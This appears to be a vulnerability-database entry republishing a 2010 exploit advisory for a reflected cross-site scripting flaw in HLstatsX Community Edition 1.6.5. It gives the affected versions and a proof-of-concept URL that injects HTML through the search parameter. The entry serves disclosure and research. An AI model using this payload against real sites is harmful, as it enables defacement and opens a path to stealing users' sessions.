Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackSoraEXPLOITPACK:7A23714230B7F39C78DBFCD5A15E0F73
HistoryJan 02, 2010 - 12:00 a.m.

HLstatsX Community Edition 1.6.5 - Cross-Site Scripting

2010-01-0200:00:00
Sora
13
JSON

HLstatsX Community Edition 1.6.5 - Cross-Site Scripting

# Exploit Title: HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability
# Date: January 1st, 2010
# Author: Sora
# Version: 1.6.5 and lower versions
# Tested on: Windows Vista

-------------------------------------------
> HLstatsX CE 1.6.5 XSS Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/

# DESCRIPTION:
HLstatsX Community Edition suffers from a XSS vulnerability.

# PoC:
http://www.example.com/hlstatsx/hlstats.php?mode=search&q=%3CH1%3EHacked by Sora%3C%2FH1%3E&st=player&game=l4d

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!
JSON